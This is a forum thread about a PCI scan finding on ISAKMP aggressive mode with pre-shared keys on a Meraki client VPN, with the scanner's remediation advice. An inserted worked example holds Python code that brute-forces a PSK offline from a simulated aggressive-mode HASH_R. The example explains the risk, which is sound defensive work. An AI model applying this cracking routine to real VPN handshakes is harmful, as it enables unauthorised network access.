PCI Compliance and Client VPN

lpopejoy
A model citizen


How would you guys handle this with Meraki?

 

Here's the email from ControlScan:

The external scan detected ISAKMP with aggressive mode pre-shared secret authentication.

The vulnerability is that the hash (pre-shared key) is not encrypted!

Suggestions for remediation are as follows.

Solutions:

- Isolate the credit card subnet from the VPN subnet failing the scan. (Please send a network diagram.)
- Disable Aggressive Mode and use Main Mode.
- Do not use a pre-shared key for authentication if possible; use strong certificates.
- If possible, do not allow VPN connections from all IP addresses; restrict them with an ACL (Access Control List).
- If using a pre-shared key cannot be avoided, use very strong keys along with multifactor authentication in accordance with PCI DSS 8.3.2.

Please send a screenshot of your login or configuration page for the multifactor authentication tool/application used to access the VPN (e.g. DUO, Symantec, Azure Authentication Manager, etc.).

PCI DSS 8.3.2

Please note that all remote access to the credit card subnet requires multifactor authentication per PCI DSS 8.3.2.

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf
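What the scanner is actually objecting to, shown as an added worked example (this is not code from the original post, from ControlScan or from Meraki): in ISAKMP aggressive mode with pre-shared-key authentication the responder's second message carries HASH_R unencrypted, and every other input to HASH_R is either chosen by the initiator or also sent in the clear. The PSK itself is never transmitted, but anyone who can send message 1 and receive message 2 can recompute HASH_R under candidate keys and brute-force the PSK offline, which is why the email pushes main mode, certificates, source-address restriction and strong keys. The formulas follow RFC 2409 sections 5.1 and 5.4 with SHA-1 as the negotiated hash; the responder, its identity, the SA payload body and the wordlist are constructed stand-ins, and `simulate_responder`, `crack_psk` and `WORDLIST` are names chosen here, not anything from the page.

```python
"""
Added example (not from the original post, ControlScan or Meraki): why an
ISAKMP aggressive-mode responder that authenticates with a pre-shared key is
flagged. In aggressive mode the responder's second message carries HASH_R
unencrypted, and every other input to HASH_R is either chosen by the
initiator or also sent in the clear, so anyone who can send message 1 and
receive message 2 can brute-force the PSK offline. Formulas follow RFC 2409
sections 5.1 and 5.4 with SHA-1 as the negotiated hash (prf = HMAC-SHA1).
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, replace
from typing import Iterable, Optional

PRF_HASH = hashlib.sha1  # prf is HMAC keyed with the negotiated hash (RFC 2409 s3.2)


@dataclass(frozen=True)
class AggressiveMsg2:
    """What an unauthenticated initiator holds after one aggressive-mode
    round trip. Nothing here is encrypted; the PSK itself is never sent."""
    cky_i: bytes    # initiator cookie (chosen by the initiator)
    cky_r: bytes    # responder cookie
    gxi: bytes      # initiator DH public value g^xi (chosen by the initiator)
    gxr: bytes      # responder DH public value g^xr
    ni: bytes       # initiator nonce Ni_b (chosen by the initiator)
    nr: bytes       # responder nonce Nr_b
    sai_b: bytes    # body of the initiator's SA payload
    idir_b: bytes   # body of the responder's ID payload
    hash_r: bytes   # HASH_R as observed on the wire


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)   (RFC 2409 s5.4)."""
    return hmac.new(psk, ni + nr, PRF_HASH).digest()


def compute_hash_r(psk: bytes, m: AggressiveMsg2) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)   (RFC 2409 s5.1)."""
    skeyid = skeyid_psk(psk, m.ni, m.nr)
    data = m.gxr + m.gxi + m.cky_r + m.cky_i + m.sai_b + m.idir_b
    return hmac.new(skeyid, data, PRF_HASH).digest()


def simulate_responder(psk: bytes, idir_b: bytes = b"vpn.example.invalid") -> AggressiveMsg2:
    """Constructed stand-in for a gateway answering aggressive-mode message 1.
    Cookies, nonces and DH values are random placeholders: real g^x values come
    from a DH group, but HASH_R depends only on the bytes as they appear on the
    wire, which is all the attacker needs. The SA body is a constructed
    placeholder for the initiator's transform list."""
    draft = AggressiveMsg2(
        cky_i=secrets.token_bytes(8), cky_r=secrets.token_bytes(8),
        gxi=secrets.token_bytes(128), gxr=secrets.token_bytes(128),
        ni=secrets.token_bytes(20), nr=secrets.token_bytes(20),
        sai_b=b"constructed-SA-payload-body", idir_b=idir_b, hash_r=b"",
    )
    return replace(draft, hash_r=compute_hash_r(psk, draft))


def crack_psk(m: AggressiveMsg2, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R under each candidate PSK and
    compare with the observed value. No further traffic to the gateway is
    needed, so VPN-side rate limiting or lockout never triggers; only key
    entropy (or not using aggressive mode with a PSK at all) limits it."""
    for psk in candidates:
        if hmac.compare_digest(compute_hash_r(psk, m), m.hash_r):
            return psk
    return None


# Constructed wordlist for the demonstration.
WORDLIST = [b"password", b"meraki", b"cisco123", b"Summer2019!"]


def demo():
    """Weak PSK is recovered from a single round trip; a random 256-bit PSK is not."""
    weak = simulate_responder(b"cisco123")
    strong = simulate_responder(secrets.token_bytes(32))
    return crack_psk(weak, WORDLIST), crack_psk(strong, WORDLIST)


if __name__ == "__main__":
    found_weak, found_strong = demo()
    print("weak PSK recovered:  ", found_weak)
    print("strong PSK recovered:", found_strong)
```

The point of the contrast with main mode is that there HASH_R travels inside the encrypted identity-protection messages, under keys that are themselves derived from SKEYID and therefore from the PSK, so an unauthenticated initiator never obtains a value it can test offline. A long random PSK defeats the dictionary attack in the demo, but it does not change the mode the scanner detects; the findings the email leads with (main mode, certificates, restricting which source addresses may reach the IKE service) are what remove the condition rather than merely raise the cost of exploiting it.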

2 replies
PhilipDAth
Kind of a big deal

Are you using client VPN?  Is it possible to turn it off in your environment?
